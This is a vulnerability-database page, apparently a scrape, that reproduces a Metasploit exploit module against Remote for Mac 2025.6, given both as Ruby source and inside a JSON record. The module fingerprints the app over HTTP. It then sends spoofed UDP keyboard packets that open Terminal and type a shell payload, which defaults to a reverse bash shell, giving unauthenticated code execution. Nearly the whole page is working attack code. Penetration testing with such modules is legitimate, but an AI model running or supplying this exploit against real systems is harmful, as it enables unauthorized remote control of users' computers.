Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE_MSF:EXPLOIT-OSX-MISC-REMOTE_FOR_MAC_UDP_RCE-

Description

This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6. When the "Allow...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-OSX-MISC-REMOTE_FOR_MAC_UDP_RCE-

Published Aug 28, 2025 at 18:53

Modified Aug 29, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Udp
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',
'Description' => %q{
This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.
When the "Allow unknown devices" setting is enabled, it is possible to simulate keyboard input via UDP packets
without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute
arbitrary shell commands, achieving code execution as the current user.
},
'Author' => ['Chokri Hammedi'],
'License' => MSF_LICENSE,
'References' => [
['PACKETSTORM', '196351']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [
[
'Unix Shell', {
'Platform' => 'unix',
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
},
'DefaultPayload' => 'cmd/unix/reverse_bash',
'DisclosureDate' => '2025-05-27',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
}
)
)
end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api', 'getVersion')
})

return CheckCode::Safe('Application might not be Remote For Mac') unless res&.code == 200

json_body = res.get_json_document
auth_enabled = json_body.fetch('requires.auth', nil)

return CheckCode::Detected('Remote For Mac detected, but authentication enabled') unless auth_enabled.to_s == 'false'

version = json_body.fetch('version').to_s

return CheckCode::Unknown('Could not determine target version') if version.empty?

target_version = Rex::Version.new(version)
vulnerable_version = Rex::Version.new('2025.7')

return CheckCode::Appears("Detected vulnerable version #{version} with authentication disabled") if target_version <= vulnerable_version

CheckCode::Safe("Target version #{version} is not vulnerable")
end

def exploit
initial_packets_hex = [
'07000200370001',
'07000200370001',
'060003002000',
'07000200370000',
'07000200370000'
]

final_packets_hex = [
'07000200240001',
'07000200240000'
]

udp_sock = connect_udp

print_status('Simulating system keyboard input to open Terminal...')
initial_packets_hex.each do |hexpkt|
udp_sock.put([hexpkt].pack('H*'))
select(nil, nil, nil, 0.05)
end

prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')
'terminal'.each_char do |ch|
pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
udp_sock.put(pkt)
select(nil, nil, nil, 0.1)
end

final_packets_hex.each do |hexpkt|
udp_sock.put([hexpkt].pack('H*'))
end

print_status('Initial sequence finished, waiting for terminal to be spawned..')

sleep(2)

shell_cmd = payload.encoded
print_status('Sending malicious payload to be executed...')

shell_cmd.each_char do |ch|
pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')
udp_sock.put(pkt)
select(nil, nil, nil, 0.1)
end

final_packets_hex.each do |hexpkt|
udp_sock.put([hexpkt].pack('H*'))
end

print_good('Payload sent. Awaiting session...')
disconnect_udp(udp_sock)
end
end

{
    "lastseen": "2025-08-29T19:54:17",
    "description": "This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.           When the "Allow...",
    "published": "2025-08-28T18:53:58",
    "modified": "2025-08-29T18:53:43",
    "type": "metasploit",
    "title": "Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-OSX-MISC-REMOTE_FOR_MAC_UDP_RCE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::Remote::Udp\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Remote for Mac 2025.6 Unauthenticated UDP Keyboard RCE',\n        'Description' => %q{\n          This module exploits an unauthenticated remote code execution vulnerability in Remote for Mac 2025.6.\n          When the \"Allow unknown devices\" setting is enabled, it is possible to simulate keyboard input via UDP packets\n          without authentication. By sending a sequence of key presses, an attacker can open the Terminal and execute\n          arbitrary shell commands, achieving code execution as the current user.\n        },\n        'Author' => ['Chokri Hammedi'],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['PACKETSTORM', '196351']\n        ],\n        'Platform' => 'unix',\n        'Arch' => ARCH_CMD,\n        'Targets' => [\n          [\n            'Unix Shell', {\n              'Platform' => 'unix',\n              'Arch' => ARCH_CMD\n            }\n          ]\n        ],\n        'DefaultTarget' => 0,\n        'DefaultOptions' => {\n          'SSL' => true\n        },\n        'DefaultPayload' => 'cmd/unix/reverse_bash',\n        'DisclosureDate' => '2025-05-27',\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]\n        }\n      )\n    )\n  end\n\n  def check\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion')\n    })\n\n    return CheckCode::Safe('Application might not be Remote For Mac') unless res&.code == 200\n\n    json_body = res.get_json_document\n    auth_enabled = json_body.fetch('requires.auth', nil)\n\n    return CheckCode::Detected('Remote For Mac detected, but authentication enabled') unless auth_enabled.to_s == 'false'\n\n    version = json_body.fetch('version').to_s\n\n    return CheckCode::Unknown('Could not determine target version') if version.empty?\n\n    target_version = Rex::Version.new(version)\n    vulnerable_version = Rex::Version.new('2025.7')\n\n    return CheckCode::Appears(\"Detected vulnerable version #{version} with authentication disabled\") if target_version <= vulnerable_version\n\n    CheckCode::Safe(\"Target version #{version} is not vulnerable\")\n  end\n\n  def exploit\n    initial_packets_hex = [\n      '07000200370001',\n      '07000200370001',\n      '060003002000',\n      '07000200370000',\n      '07000200370000'\n    ]\n\n    final_packets_hex = [\n      '07000200240001',\n      '07000200240000'\n    ]\n\n    udp_sock = connect_udp\n\n    print_status('Simulating system keyboard input to open Terminal...')\n    initial_packets_hex.each do |hexpkt|\n      udp_sock.put([hexpkt].pack('H*'))\n      select(nil, nil, nil, 0.05)\n    end\n\n    prefix = [0x06, 0x00, 0x03, 0x00].pack('C*')\n    'terminal'.each_char do |ch|\n      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')\n      udp_sock.put(pkt)\n      select(nil, nil, nil, 0.1)\n    end\n\n    final_packets_hex.each do |hexpkt|\n      udp_sock.put([hexpkt].pack('H*'))\n    end\n\n    print_status('Initial sequence finished, waiting for terminal to be spawned..')\n\n    sleep(2)\n\n    shell_cmd = payload.encoded\n    print_status('Sending malicious payload to be executed...')\n\n    shell_cmd.each_char do |ch|\n      pkt = prefix + ch.encode('utf-16le').force_encoding('ASCII-8BIT')\n      udp_sock.put(pkt)\n      select(nil, nil, nil, 0.1)\n    end\n\n    final_packets_hex.each do |hexpkt|\n      udp_sock.put([hexpkt].pack('H*'))\n    end\n\n    print_good('Payload sent. Awaiting session...')\n    disconnect_udp(udp_sock)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/misc/remote_for_mac_udp_rce.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/osx/misc/remote_for_mac_udp_rce/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply